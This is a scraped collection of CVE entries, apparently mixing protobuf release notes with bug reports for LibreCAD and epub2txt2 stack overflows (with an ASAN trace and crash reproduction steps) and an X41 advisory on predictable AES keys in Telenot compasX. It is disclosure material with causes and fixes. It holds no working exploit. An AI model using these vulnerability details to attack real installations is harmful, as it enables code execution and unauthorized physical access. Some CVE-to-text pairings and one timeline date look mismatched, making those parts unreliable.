*   Fix for compiler warning issue#8145 (#8160)
*   fix: support deprecated enums for GCC < 6 (#8164)
*   Fix some warning when compiling with Visual Studio 2019 on x64 target (#8125)

**Python**

*   Provided an override for the reverse() method that will reverse the internal  
    collection directly instead of using the other methods of the BaseContainer.
*   MessageFactory.CreateProtoype can be overridden to customize class creation.
*   Fix PyUnknownFields memory leak (#7928)
*   Add macOS big sur compatibility (#8126)

**JavaScript**

*   Generate getDescriptor methods with * as their this type.
*   Enforce let/const for generated messages.
*   js/binary/utils.js: Fix jspb.utils.joinUnsignedDecimalString to work with negative bitsLow and low but non-zero bitsHigh parameter. (#8170)

**PHP**

*   Added support for PHP 8. (#8105)
*   unregister INI entries and fix invalid read on shutdown (#8042)
*   Fix PhpDoc comments for message accessors to include "|null". (#8136)
*   fix: convert native PHP floats to single precision (#8187)
*   Fixed PHP to support field numbers >=2\*\*28. (#8235)
*   feat: add support for deprecated fields to PHP compiler (#8223)
*   Protect against stack overflow if the user derives from Message. (#8248)
*   Fixed clone for Message, RepeatedField, and MapField. (#8245)
*   Updated upb to allow nonzero offset minutes in JSON timestamps. (#8258)

**Ruby**

*   Added support for Ruby 3. (#8184)
*   Rewrote the data storage layer to be based on upb\_msg objects from the  
    upb library. This should lead to much better parsing performance,  
    particularly for large messages. (#8184).
*   Fill out JRuby support (#7923)
*   \[Ruby\] Fix: (SIGSEGV) gRPC-Ruby issue on Windows. memory alloc infinite  
    recursion/run out of memory (#8195)
*   Fix jruby support to handle messages nested more than 1 level deep (#8194)

**Java**

*   Avoid possible UnsupportedOperationException when using CodedInputSteam  
    with a direct ByteBuffer.
*   Make Durations.comparator() and Timestamps.comparator() Serializable.
*   Add more detailed error information for dynamic message field type  
    validation failure
*   Removed declarations of functions declared in java\_names.h from  
    java\_helpers.h.
*   Now Proto3 Oneof fields have "has" methods for checking their presence in  
    Java.
*   Annotates Java proto generated \*\_FIELD\_NUMBER constants.
*   Add -assumevalues to remove JvmMemoryAccessor on Android.

**C#**

*   Fix parsing negative Int32Value that crosses segment boundary (#8035)
*   Change ByteString to use memory and support unsafe create without copy (#7645)
*   Optimize MapField serialization by removing MessageAdapter (#8143)
*   Allow FileDescriptors to be parsed with extension registries (#8220)
*   Optimize writing small strings (#8149)

CVE-2021-22570: Release Protocol Buffers v3.15.0 · protocolbuffers/protobuf

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

CVE-2022-0359: Heap-based Buffer Overflow in vim

In LibreCAD 2.2.0, a NULL pointer dereference in the HATCH handling of libdxfrw allows an attacker to crash the application using a crafted DXF document.

**Steps to reproduce or sample file**

1.  Unzip and load the attached proof of concept file in LibreCAD 2.2.0-rc3

**Cause**

The std::shared_ptr DRW_Hatch::loop is written to when loading a HATCH entity with code 93. If this occurs before a code 92, the pointer is still NULL, leading to a crash.

**Impact**

Denial of service.

**Proposed Mitigation**

Ensure that DRW_Hatch::loop is not NULL before dereferencing at drw_entities.cpp:1808

**Operating System and LibreCAD version info**

Version: 2.2.0-rc3  
Compiler: GNU GCC 7.3.0  
Compiled on: Nov 29 2021  
Qt Version: 5.12.4  
Boost Version: 1.65.1  
System: Windows 10 (10.0)

CVE-2021-45343: NULL pointer dereference in DXF parser, HATCH code 93 · Issue #1468 · LibreCAD/LibreCAD

A buffer overflow vulnerability in CDataList of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document.

**Vulnerable Products**

*   LibreCAD 2.2.0-rc3 and older

**Steps to reproduce or sample file**

1.  Start LibreCAD 2.2.0 in a debugger
    
2.  File/Open...
    
3.  Unzip and open the attached proof-of-concept file
    
4.  Observe ACCESS_VIOLATION crash, with eip=0x41414141 (AAAA)
    

Screenshot:

**Cause**

The CDataList entity deserialization in LibreCAD/libraries/jwwlib/src/jwwdoc.h is vulnerable to a stack buffer overflow. char buf[512] declared in CDataList::Serialize() on line 784 is of fixed size 512. One variety of CDataList provides its own size field, as seen on line 795 and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables, including the return address.

The attached PoC file is tuned to trigger this behavior in the latest windows release of LibreCAD, but the same bug is also present  
in older versions and on other platforms.

**Note**: This is similar to, but distinct from issue #1462

**Impact**

An attacker can craft a JW-CAD input file and thereby gain control over execution flow (EIP controlled directly).

This allows an attacker to run arbitrary code on the system running LibreCAD, with the privileges of the current user.

**Proposed Mitigation**

1.  Perform bounds checking in CDataList::Serialize(), and refuse to load more data to buf than actually supported.
2.  Enable stack smashing protection in the windows build of LibreCAD.

**Operating System and LibreCAD version info**

Version: 2.2.0-rc3  
Compiler: GNU GCC 7.3.0  
Compiled on: Nov 29 2021  
Qt Version: 5.12.4  
Boost Version: 1.65.1  
System: Windows 10 (10.0)

CVE-2021-45342: Remote Code Execution vulnerability in LibreCAD 2.2.0-rc3 (JWW CDataList) · Issue #1464 · LibreCAD/LibreCAD

A buffer overflow vulnerability in CDataMoji of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document.

**Vulnerable Products**

*   LibreCAD 2.2.0-rc3 and older
*   Jw\_cad 8.24a and older

**Steps to reproduce or sample file**

1.  Start LibreCAD 2.2.0-rc3 in a debugger
2.  File/Open...
3.  Unzip and open the attached proof of concept file
4.  Observe ACCESS_VIOLATION crash, with eip=0x41414141 (AAAA)

Screenshot:

**Cause**

The CDataMoji entity deserialization at LibreCAD/libraries/jwwlib/src/jwwdoc.h is vulnerable to  
a stack buffer overflow.  
char buf[512] declared in CDataMoji::Serialize() on line 512  
is of fixed size 512. Some varieties of CDataMoji provide their own size, e.g. MojiData2 on line 523  
and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables,  
including the return address.

The attached PoC file is tuned to trigger this behavior in the latest windows release of LibreCAD, but the same bug is also present  
in older versions and on other platforms.

**Impact**

An attacker can craft a JW-CAD input file and thereby gain control over execution flow (EIP controlled directly).

This allows an attacker to run arbitrary code on the system running LibreCAD, with the privileges of the current user.

**Proposed Mitigation**

1.  Perform bounds checking in CDataMoji::Serialize(), and refuse to load the file if it would overflow buf.
2.  Enable stack smashing protection in the windows build of LibreCAD.

**Operating System and LibreCAD version info**

Version: 2.2.0-rc3  
Compiler: GNU GCC 7.3.0  
Compiled on: Nov 29 2021  
Qt Version: 5.12.4  
Boost Version: 1.65.1  
System: Windows 10 (10.0)

CVE-2021-45341: Remote Code Execution vulnerability in LibreCAD 2.2.0-rc3 (JWW CDataMoji) · Issue #1462 · LibreCAD/LibreCAD

xhtml_translate_entity in xhtml.c in epub2txt (aka epub2txt2) through 2.02 allows a stack-based buffer overflow via a crafted EPUB document.

**Description**

A stack-buffer-overflow was discovered in epub2txt2.  
The issue is being triggered in function xhtml\_translate\_entity() at src/xhtml.c:576

**Version**

Version 2.02 (Lastest)

**Environment**

Ubuntu 18.04, 64bit

**Reproduce****Command**

    git clone the Lastest Version firstly.
    make && make install
    ./epub2txt poc
    

POC file at the bottom of this report.

**With ASAN**

Note: You can use ASAN for more direct verification.

    Compile program with address sanitizer with this command:
    VERSION := 2.02
    CC      := gcc
    CFLAGS  := -Wall -fPIC -fPIE
    LDLAGS  := -pie 
    DESTDIR :=
    PREFIX  := /usr
    BINDIR  := /bin
    MANDIR  := /share/man
    APPNAME := epub2txt
    
    TARGET	:= epub2txt 
    SOURCES := $(shell find src/ -type f -name *.c)
    OBJECTS := $(patsubst src/%,build/%,$(SOURCES:.c=.o))
    DEPS	:= $(OBJECTS:.o=.deps)
    
    $(TARGET): $(OBJECTS)
    	$(CC) -fsanitize=address -o $(TARGET) $(LDFLAGS) $(OBJECTS) 
    
    build/%.o: src/%.c
    	@mkdir -p build/
    	$(CC) $(CFLAGS) -fsanitize=address -g -DVERSION=\"$(VERSION)\" -DAPPNAME=\"$(APPNAME)\" -MD -MF $(@:.o=.deps) -c -o $@ $< 
    
    clean:
    	$(RM) -r build/ $(TARGET) 
    
    install:
    	install -D -m 755 $(APPNAME) $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	install -D -m 644 man1/epub2txt.1 $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    uninstall:
    	rm -f $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	rm -f $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    -include $(DEPS)
    
    .PHONY: clean install
    
    

**ASAN Report**

    warning [./input/id:000029,sig:11,src:000553,time:174169875,op:havoc,rep:4]:  3 extra bytes at beginning or within zipfile
      (attempting to process anyway)
    file #1:  bad zipfile offset (local header sig):  3
      (attempting to re-compensate)
    /tmp/epub2txt14993/OEBPS/cover.xml  bad CRC aa74ee30  (should be 4874d916)
      error:  invalid compressed data to inflate /tmp/epub2txt14993/OEBPS/images/GeographyofBli-cover.jpg
    file #8:  bad zipfile offset (local header sig):  163411
      (attempting to re-compensate)
    file #8:  bad zipfile offset (local header sig):  163411
    file #9:  bad zipfile offset (local header sig):  181495
    /tmp/epub2txt14993/OEBPS/GeographyofBli_toc.html  bad CRC 0938f2f2  (should be 64dedce7)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_copyright.html  bad CRC 5d8cbd1a  (should be 9b5bfa5d)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_body_split_001.html  bad CRC 1a36209f  (should be 81fec8f3)
    =================================================================
    ==14993==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffcb14 at pc 0x7ffff6e7e3a6 bp 0x7fffffffca60 sp 0x7fffffffc208
    WRITE of size 305 at 0x7fffffffcb14 thread T0
        #0 0x7ffff6e7e3a5  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5)
        #1 0x55555558000e in xhtml_translate_entity src/xhtml.c:576
        #2 0x555555580b34 in xhtml_to_stdout src/xhtml.c:789
        #3 0x555555580680 in xhtml_file_to_stdout src/xhtml.c:700
        #4 0x555555560476 in epub2txt_do_file src/epub2txt.c:494
        #5 0x55555555d3c9 in main src/main.c:187
        #6 0x7ffff6a48bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
        #7 0x55555555c219 in _start (/home/nisl1/nisl8121/Asteriska/fuzz/projects/epub2txt2-master/valid/epub2txt+0x8219)
    
    Address 0x7fffffffcb14 is located in stack of thread T0 at offset 116 in frame
        #0 0x55555557fad4 in xhtml_translate_entity src/xhtml.c:532
    
      This frame has 2 object(s):
        [32, 36) 'v'
        [96, 116) 'out' <== Memory access at offset 116 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5) 
    Shadow bytes around the buggy address:
      0x10007fff7910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7950: 00 00 00 00 f1 f1 f1 f1 04 f2 f2 f2 f2 f2 f2 f2
    =>0x10007fff7960: 00 00[04]f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7980: 00 00 f1 f1 f1 f1 f8 f2 f2 f2 00 00 00 00 00 00
      0x10007fff7990: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2
      0x10007fff79a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff79b0: 00 00 00 00 00 00 f1 f1 f1 f1 f8 f2 f2 f2 f2 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==14993==ABORTING
    
    

**POC**

POC

Any issue plz contact with me:  
admin@hack.best  
OR:  
twitter: @Asteriska8

CVE-2022-23850: [Bug Report]stack-buffer-overflow in Function epub2txt_do_file() AT src/epub2txt.c · Issue #17 · kevinboone/epub2txt2

Telenot CompasX versions prior to 32.0 use a weak seed for random number generation leading to predictable AES keys used in the NFC tags used for local authorization of users. This may lead to total loss of trustworthiness of the installation.



**Severity Rating:** High

**Confirmed Affected Versions:** <32.0

**Confirmed Patched Versions:** >=32.0

**Vendor:** TELENOT ELECTRONIC GMBH

**Vendor URL:** https://www.telenot.com/

**Vendor Reference:** -

**Vector:** Physical / Remote

**Credit:** X41 D-SEC GmbH, Markus Vervier, Yaşar Klawohn

**Status:** Private

**CVE:** CVE-2021-34600

**CWE:** 340, 338

**CVSS Score:** N/A

**CVSS Vector:** N/A

**Advisory-URL:** https://www.x41-dsec.de/lab/advisories/x41-2021-003-telenot-complex-insecure-keygen/

**Summary and Impact**

The _complex_ alarm system manufactured by Telenot supports the use of NFC  
tags for the authorization of users using DESFire EV2\[6\] tags that support  
AES encryption.  
The supplied management software _compasX_ can generate the secret AES keys  
that are stored both on the system and the NFC tag and are used for the mutual  
authentication between them.  
It was found that keys generated using compasX are predictable,  
which allows attackers to clone NFC tags and gain unauthorized access to  
secured areas, unless further security controls, like the requirement to provide  
a PIN, are in place.

Deployments which use both

*   NFC tags of type MIFARE DESFire EV1 or EV2
*   AES keys generated with vulnerable compasX versions for use  
    with the above tags

are vulnerable. All such AES keys should be replaced (including those  
used for remote access) by either a manually generated key or  
by using a recent compasX software revision (32.0) that is using a cryptographically  
secure random number generator.

**Root Cause Analysis**

compasX versions older than 32.0 use random numbers supplied by  
the cryptographically insecure PRNG implementation of the rand() function  
to create AES keys.  
The PRNG instance is seeded with the current system time as UNIX timestamp  
via calls to srand(time()). Because the supplied timestamp value is a  
32-bit number, the amount of possible seeds is bounded by the maximum  
unsigned 32 bit value of 4294967295, down from  
2128 possible keys for the used AES128. It is feasible  
to search the whole key space on a modern Desktop system in reasonable time.

The possible key space can be even further reduced when assuming that  
MIFARE DESFire EV1 seems to have first been introduced in 2006. Between  
2006-01-01 00:00:00 GMT (timestamp 1136073600) and 2021-11-30 00:00:00 GMT  
(timestamp 1638230400) there are 502156800 timestamps that could have been  
used as seeds.

The Borland C/C++ library used in compasX, states that “rand uses a multiplicative  
congruential random number generator”1, which is not a cryptographically secure  
pseudorandom number generator (CSPRNG).  
It’s important to note that even if the seed hadn’t been time-based, rand()  
“generates a well-known sequence and isn’t appropriate for use as a  
cryptographic function”2. While the previous quote is from Microsoft’s  
documentation about their own implementation, a comparable warning is missing  
from the documentation of the used implementation of rand().

The current recommended CSPRNG on modern Windows systems is  
BCryptGenRandom3, which is part of the “Cryptography API: Next  
Generation”4.

**Proof of Concept**

Head over to the blog post for a detailed description and our proof of concept!

**Workaround**

It is strongly recommended to raise the security level during the time window  
until the AES keys can be changed to securely generated ones.  
The complex alarm systems supports alternative authentication factors that  
can be combined with the Desfire NFC tag authentication.  
An example for such an additional factor is a requirement for a valid  
PIN entry on the complex alarm system in addition to a successful  
Desfire authentication to disarm the alarm.

**Timeline**

**2021-09-02** Problem discovered during internal audit and impact assessed

**2021-09-07** Initial contact with Telenot

**2021-09-20** Disclosure and discussion of all technical details to Telenot

**2021-12-01** Telenot releases of a fixed version of compasX, notifies customers

**2021-12-01** CVE requested

**2021-12-02** CVE-2021-34600 assigned

**2021-01-18** Public disclosure

**About X41 D-SEC GmbH**

X41 is an expert provider for application security services. Having extensive  
industry experience and expertise in the area of information security, a strong  
core security team of world class security experts enables X41 to perform  
premium security services.

Fields of expertise in the area of application security are security centered  
code reviews, binary reverse engineering and vulnerability discovery. Custom  
research and IT security consulting and support services are core competencies  
of X41.

Tag

#c++